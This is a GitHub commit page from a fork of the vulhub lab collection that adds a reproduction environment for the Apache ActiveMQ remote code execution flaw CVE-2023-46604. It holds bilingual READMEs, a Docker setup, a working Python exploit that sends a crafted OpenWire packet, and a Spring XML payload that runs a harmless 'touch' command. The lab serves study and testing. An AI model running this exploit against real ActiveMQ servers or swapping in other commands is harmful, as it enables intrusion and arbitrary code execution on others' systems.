forked from vulhub/vulhub
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
6 changed files
with
147 additions
and
0 deletions.
There are no files selected for viewing
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,46 @@ | ||
| # Apache ActiveMQ (Version < 5.18.3) RCE (CVE-2023-46604) | ||
|
|
||
| [中文版本(Chinese version)](README.zh-cn.md) | ||
|
|
||
| ## Environment setup | ||
|
|
||
| Enter following commands to build and run the vulnerability environment: | ||
|
|
||
| ``` | ||
| docker compose up -d | ||
| ``` | ||
|
|
||
| The environment listens to port 61616 and port 8161, of which 61616 is the working port. In this vulnerability exploitation, we only need to use port 61616. When executing the vulnerability verification process, please first access port 8161 to confirm that the service has started successfully. | ||
|
|
||
| Visit `http://your-ip:8161/` to see the web page, indicating that the environment has been successfully run. | ||
|
|
||
| ## Background brief | ||
|
|
||
| Apache ActiveMQ has a remote code execution vulnerability. This vulnerability may allow remote attackers with network access privileges to execute arbitrary shell commands by manipulating the serialized class types in the OpenWire protocol, leading to the instantiation of any class on the classpath of the agent. | ||
|
|
||
| | Default port | Default Condition | | ||
| |--------------|--------------------------------------| | ||
| | 8161 (web) | Remote access requires configuration | | ||
| | 61616 (tcp) | Remote access allowed | | ||
|
|
||
| ## Exploit | ||
|
|
||
| You can quickly start an HTTP server in the folder where the poc.xml file is located using the Python3 http.server module | ||
|
|
||
| ```shell | ||
| python3 -m http.server 6666 | ||
| ``` | ||
|
|
||
| execute poc.py | ||
|
|
||
| ```shell | ||
| python3 poc.py target port http://ip of http server/poc.xml | ||
| ``` | ||
|
|
||
| You can check inside the ActiveMQ container using the following command: | ||
|
|
||
| docker exec cve-2023-46604-activemq-1 ls -l /tmp | ||
|
|
||
| If you see the output showing that touch /tmp/activeMQ-RCE-success has been executed successfully, then the exploit has worked. | ||
|
|
||
|  |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,44 @@ | ||
| # Apache ActiveMQ (版本 < 5.18.3) RCE (CVE-2023-46604) | ||
|
|
||
| ## 环境搭建 | ||
|
|
||
| 搭建及运行漏洞环境: | ||
|
|
||
| ``` | ||
| docker compose up -d | ||
| ``` | ||
|
|
||
| 环境监听61616端口和8161端口,其中8161为web控制台端口,61616为工作端口。在本次漏洞利用中,我们只需要用到61616端口。执行漏洞验证过程时,请先访问8161端口,确认服务启动成功。 | ||
|
|
||
| 访问`http://your-ip:8161/`看到web页面,说明环境已成功运行。 | ||
|
|
||
| ## 背景简述 | ||
|
|
||
| Apache ActiveMQ存在远程代码执行漏洞。该漏洞可能允许具有网络访问权限的远程攻击者通过操纵OpenWire协议中的序列化类类型来运行任意shell命令,从而导致代理实例化类路径上的任何类。 | ||
|
|
||
| | 默认端口 | 默认条件 | | ||
| |-----------|-----------| | ||
| | 8161 web | 需配置才可远程访问 | | ||
| | 61616 tcp | 远程访问 | | ||
|
|
||
| ## 漏洞复现 | ||
|
|
||
| 在poc.xml的文件夹下启动http服务 | ||
|
|
||
| ```shell | ||
| python3 -m http.server 6666 | ||
| ``` | ||
|
|
||
| 执行poc.py | ||
|
|
||
| ```shell | ||
| python3 poc.py target port http://启动http服务的ip/poc.xml | ||
| ``` | ||
|
|
||
| 到activeMQ容器中进行查看: | ||
|
|
||
| docker exec cve-2023-46604-activemq-1 ls -l /tmp | ||
|
|
||
| 可以看到touch /tmp/activeMQ-RCE-success成功被执行: | ||
|
|
||
|  |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,7 @@ | ||
| version: '2' | ||
| services: | ||
| activemq: | ||
| image: vulhub/activemq:5.11.1-with-cron | ||
| ports: | ||
| - "61616:61616" | ||
| - "8161:8161" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,36 @@ | ||
| import io | ||
| import socket | ||
| import sys | ||
|
|
||
|
|
||
| def main(ip, port, xml): | ||
| classname = "org.springframework.context.support.ClassPathXmlApplicationContext" | ||
| socket_obj = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | ||
| socket_obj.connect((ip, port)) | ||
|
|
||
| with socket_obj: | ||
| out = socket_obj.makefile('wb') | ||
| # out = io.BytesIO() # 创建一个内存中的二进制流 | ||
| out.write(int(32).to_bytes(4, 'big')) | ||
| out.write(bytes([31])) | ||
| out.write(int(1).to_bytes(4, 'big')) | ||
| out.write(bool(True).to_bytes(1, 'big')) | ||
| out.write(int(1).to_bytes(4, 'big')) | ||
| out.write(bool(True).to_bytes(1, 'big')) | ||
| out.write(bool(True).to_bytes(1, 'big')) | ||
| out.write(len(classname).to_bytes(2, 'big')) | ||
| out.write(classname.encode('utf-8')) | ||
| out.write(bool(True).to_bytes(1, 'big')) | ||
| out.write(len(xml).to_bytes(2, 'big')) | ||
| out.write(xml.encode('utf-8')) | ||
| # print(list(out.getvalue())) | ||
| out.flush() | ||
| out.close() | ||
|
|
||
|
|
||
| if __name__ == "__main__": | ||
| if len(sys.argv) != 4: | ||
| print("Please specify the target and port and poc.xml: python3 poc.py 127.0.0.1 61616 " | ||
| "http://192.168.0.101:8888/poc.xml") | ||
| exit(-1) | ||
| main(sys.argv[1], int(sys.argv[2]), sys.argv[3]) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,14 @@ | ||
| <?xml version="1.0" encoding="UTF-8" ?> | ||
| <beans xmlns="http://www.springframework.org/schema/beans" | ||
| xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" | ||
| xsi:schemaLocation="http://www.springframework.org/schema/beans | ||
| http://www.springframework.org/schema/beans/spring-beans.xsd"> | ||
| <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> | ||
| <constructor-arg> | ||
| <list> | ||
| <value>touch</value> | ||
| <value>/tmp/activeMQ-RCE-success</value> | ||
| </list> | ||
| </constructor-arg> | ||
| </bean> | ||
| </beans> |